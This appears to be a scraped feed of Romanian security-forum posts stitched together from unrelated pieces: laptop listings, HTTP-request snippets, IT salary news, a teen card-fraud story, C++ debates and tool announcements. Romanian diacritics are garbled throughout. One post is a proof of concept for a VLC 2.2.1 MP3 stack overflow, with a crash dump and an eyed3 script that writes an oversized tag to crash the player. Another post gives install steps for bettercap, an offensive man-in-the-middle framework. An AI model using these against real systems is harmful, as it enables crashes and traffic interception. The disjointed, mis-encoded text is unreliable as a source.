Laptop Gaming Asus ROG G771JW-T7091D cu procesor Intel® Core™ i7-4720HQ, 2.60GHz, Haswell™, 17.3", Full HD, IPS, 12GB, 1TB + SSD 256GB, Blu-Ray R, nVidia GeForce GTX 960M 4GB, Free DOS, Black - eMAG.ro Laptop Gaming Asus ROG G751JT-T7210D cu procesor Intel® Core™ i7-4720HQ 2.60GHz, Haswell™, 17.3", Full HD, IPS, 16GB, 1TB + SSD 128GB, Blu-Ray R, nVidia GeForce GTX 970M 3GB, Free DOS, Black - eMAG.ro

E mai rapid de scris in Python: import urllib2 response = urllib2.urlopen('http://python.org/') html = response.read() #include <winsock2.h> #include <windows.h> #include <iostream> #pragma comment(lib,"ws2_32.lib") using namespace std; int main (){ WSADATA wsaData; if (WSAStartup(MAKEWORD(2,2), &wsaData) != 0) { cout << "WSAStartup failed.\n"; system("pause"); return 1; } SOCKET Socket=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); struct hostent *host; host = gethostbyname("www.google.com"); SOCKADDR_IN SockAddr; SockAddr.sin_port=htons(80); SockAddr.sin_family=AF_INET; SockAddr.sin_addr.s_addr = *((unsigned long*)host->h_addr); cout << "Connecting...\n"; if(connect(Socket,(SOCKADDR*)(&SockAddr),sizeof(SockAddr)) != 0){ cout << "Could not connect"; system("pause"); return 1; } cout << "Connected.\n"; send(Socket,"GET / HTTP/1.1\r\nHost: www.google.com\r\nConnection: close\r\n\r\n", strlen("GET / HTTP/1.1\r\nHost: www.google.com\r\nConnection: close\r\n\r\n"),0); char buffer[10000]; int nDataLength; while ((nDataLength = recv(Socket,buffer,10000,0)) > 0){ int i = 0; while (buffer[i] >= 32 || buffer[i] == '\n' || buffer[i] == '\r') { cout << buffer[i]; i += 1; } } closesocket(Socket); WSACleanup(); system("pause"); return 0; }

VLC Mp3 parser stack overflow # Version: 2.2.1# Tested on: Windows 7 Professional 64 bits #APP: vlc.exe #ANALYSIS_VERSION: 6.3.9600.17336 (debuggers(dbg).150226-1500) amd64fre #MODULE_NAME: libvlccore #IMAGE_NAME: libvlccore.dll #FAILURE_ID_HASH_STRING: um:wrong_symbols_c00000fd_libvlccore.dll!vlm_messageadd #Exception Hash (Major/Minor): 0x60346a4d.0x4e342e62 #EXCEPTION_RECORD: ffffffffffffffff -- (.exr 0xffffffffffffffff) #ExceptionAddress: 00000000749ba933 (libvlccore!vlm_MessageAdd+0x00000000000910d3) # ExceptionCode: c00000fd (Stack overflow) # ExceptionFlags: 00000000 #NumberParameters: 2 # Parameter[0]: 0000000000000001 # Parameter[1]: 0000000025ed2a20 # #eax=00436f00 ebx=2fdc0100 ecx=25ed2a20 edx=00632efa esi=17fb2fdc edi=00000001 #eip=749ba933 esp=260cfa14 ebp=260cfa78 iopl=0 nv up ei pl nz na po nc #cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 # #Stack Overflow starting at libvlccore!vlm_MessageAdd+0x00000000000910d3 (Hash=0x60346a4d.0x4e342e62) # import eyed3 value = u'B'*6500000 audiofile = eyed3.load("base.mp3") audiofile.tag.artist = value audiofile.tag.album = u'andrea' audiofile.tag.album_artist = u'sindoni' audiofile.tag.save() Link: https://ghostbin.com/paste/x7kjh

Câ?i bani po?i câ?tiga ca IT-ist în România ?i care sunt cele mai c?utate limbaje de programare Florin Casota Postat la 20 octombrie 2015 Compania Brainspotting a dat publicit??ii un raport în care prezint? pia?a IT din România. Potrivit raportului sunt aproximativ 100.000 de speciali?ti IT&C la nivel na?ional, iar peste 90% dintre ei vorbesc engleza ?i 27% cunosc ?i limba francez?. În 2014, România a avut reprezentan?i la olimpiadele de informatic?, unde echipele au câ?tigat o medalie de aur ?i 3 de argint, într-o competi?ie la care au participat 11 ?ari. Cel mai mult se caut? speciali?ti în dezvoltarea de software (55%), testeri (QA-9%), Mobile Developers (iOS/Android-4%) etc, iar cel mai c?utat limbaj de programare este Java (28%), urmat de PHP (15%) ?i .Net/C# (15%), C/C++ (12%). Cele mai c?utate beneficii de speciali?ti IT din România sunt: asigurare medical? (64%), urmat de ore de lucru flexibile (49%), support financiar pentru training-uri (35%), bonusuri de Cr?ciun sau Pa?te (28%) ?i bonuri de mas? (28%). Cei mai mul?i dintre ace?tia accept? un job dac? ofer? ore de lucru flexibile (41%), urmat de salariu (38%) ?i de reputa?ia, imaginea companiei unde urmeaz? s? se angajeze (32%). În Bucure?ti sunt cei mai mul?i absolven?i IT&C (2000 pe an), în Cluj (1700), Ia?i ?i Timi?oara (1100). Dar ?i în ora?e precum Brasov, Sibiu sau Craiova se înregistreaz? o cre?tere a absolven?ilor în domeniul IT (500 la Bra?ov ?i Sibiu ?i 230 la Craiova). Salariile din domeniul IT&C în România încep de la 500 de euro/lun? pentru un post junior de Quality Assurance, iar cel mai mare salariu îl poate ob?ine un senior Mac iOS Developer sau un Big Data Analyst (2000-3500 de euro). Sursa: Câ?i bani po?i câ?tiga ca IT-ist în România ?i care sunt cele mai c?utate limbaje de programare - BusinessMagazin

Aveti grija, lucreaza la NSA!

Un adolescent de numai 16 ani din Cluj a reu?it s? fure peste 60.000 de lei din conturile clien?ilor de la mai multe b?nci. Conform anchetatorilor clujeanul ?i-ar fi început „meseria” de la 13 ani, dar pân? acum a fost iertat de autorit??i. Acesta este acuzat de s?vâr?irea a 13 (treisprezece) infrac?iuni de efectuare de opera?iuni financiare în mod fraudulos ?i a 3 (trei) infrac?iuni de tentativ? la efectuare de opera?iuni financiare în mod fraudulos, sub forma autoratului. „În perioada august – 15 septembrie 2015 inculpatul O. C.-I., în vârst? de 16 ani, a folosit în mod neautorizat date de identificare ale cardurilor bancare emise, dup? caz, de c?tre Banca Transilvania, Banca Comercial? Român?, Unicredit Bank, Millenium Bank ?i Marfin Bank Romania unui num?r de 16 (?aisprezece) titulari de pe întreg teritoriul României, efectuând sau încercând s? efectueze transferuri frauduloase de fonduri din conturile bancare ale acestora, în scopul achizi?ion?rii de produse de telecomunica?ii ?i IT (în special telefoane mobile de ultim? genera?ie), al transfer?rii de bani, al credit?rii unor conturi virtuale pentru convertirea monedei centralizate în moned? digital?, al reînc?rc?rii cartelelor telefonice precum ?i pentru achizi?ionarea de jocuri electronice”, scrie în rechizitoriu. În activitatea sa, inculpatul minor a încercat s? efectueze în mod fraudulos, în mediul online, tranzac?ii financiare în sum? total? de 96.210,18 lei ?i 40,48 dolari, reu?ind producerea un prejudiciu de 63.569,14 lei ?i 31,61 dolari, scrie romaniatv.net care citeaz? clujust.ro.. Dosarul a fost înaintat, spre competent? solu?ionare, Judec?toriei Cluj-Napoca. Sursa: Cluj: Un Hacker de doar 16 ani a furat peste 60.000 de lei din conturile mai multor clien?i - Cluj Capitala

Attention whores.

3. Nu am spus ca e singurul. Alte limbaje au binding-uri/wrappere, un overhead de performanta. 4. La fel ca mai sus, au diverse binding-uri/wrappere. In plus, fiind scrise in C/C++, tipurile de date ale parametrilor si valorilor returnate sunt cele din C/C++. In alte limbaje trebuie sa te adaptezi la aceste cerinte. Da, ai dreptate cu productivitatea, insa folosind diferite biblioteci poti avea productivitate. Vezi boost, are tot ce iti trebuie, cross-platform. "Limbajul cel mai folosit pentru aplicatii este de departe Delphi (peste 90%)." - Nici pe departe. Zi-mi 2-3 aplicatii mari scrise in Delphi. Cele mai folosite limbaje: Java, PHP, C++ (ordinea nu conteaza). Exemple: Microsoft Office, Google Chrome, Firefox, VLC, Antivirusi si extrem de multe altele - totul in C++ (sau C).

C++ + Python

Babun - a windows shell Would you like to use a linux-like console on a Windows host without a lot of fuzz? Try out babun! Have a look at a 2 minutes long screencast by @tombujok: Introduction to the Babun Project on Vimeo Installation Just download the dist file from http://babun.github.io, unzip it and run the install.bat script. After a few minutes babun starts automatically. The application will be installed to the %USER_HOME%\.babundirectory. Use the '/target' option to install babun to a custom directory. [TABLE=width: 728] [TR] [TD]Note[/TD] [TD]There is no interference with existing Cygwin installation[/TD] [/TR] [/TABLE] [TABLE=width: 728] [TR] [TD]Note[/TD] [TD]You may have "whitespace" chars in your username - it is not recommended by Cygwin though FAQ[/TD] [/TR] [/TABLE] Features in 10 seconds Babun features the following: Pre-configured Cygwin with a lot of addons Silent command-line installer, no admin rights required pact - advanced package manager (like apt-get or yum) xTerm-256 compatible console HTTP(s) proxying support Plugin-oriented architecture Pre-configured git and shell Integrated oh-my-zsh Auto update feature "Open Babun Here" context menu entry Have a look at a sample screenshot! Do you like it? Follow babun on Twitter @babunshell or @tombujok. Link: https://github.com/babun/babun

Copyleft of Simone 'evilsocket' Margaritelli*. bettercap - a complete, modular, portable and easily extensible MITM framework. bettercap is a complete, modular, portable and easily extensible MITM tool and framework with every kind of diagnostic and offensive feature you could need in order to perform a man in the middle attack. HOW TO INSTALL Stable Release ( GEM ) gem install bettercap From Source git clone https://github.com/evilsocket/bettercap cd bettercap gem build bettercap.gemspec sudo gem install bettercap*.gem DEPENDS All dependencies will be automatically installed through the GEM system, in some case you might need to install some system dependency in order to make everything work: sudo apt-get install ruby-dev libpcap-dev This should solve issues such as this one. EXAMPLES & INSTRUCTIONS Please refer to the official website. Sursa: https://github.com/evilsocket/bettercap

OpenSSH Win32 port of OpenSSH Look at the wiki for help Link: https://github.com/PowerShell/Win32-OpenSSH

De ce e "powerfull" C++: 1. cross-platform - Compilatoare atat open-source cat si comerciale 2. optimizat - Un limbaj interpretat nu va ajunge niciodata la viteza sa 3. capabil - Pointeri, mostenire, polimorfism si tot ce ti-ai putea dori de la un limbaj de programare 4. biblioteci - STL, Boost, OpenSSL si multe alte biblioteci sunt create pentru a fi folosite din C++ 5. stabil - Standard vechi, bine definit, implementat si inteles De ce nu e popular? 1. Nu e pentru cei slabi de inima.

It's on Youtube, it must be true.

E tema pentru mobile.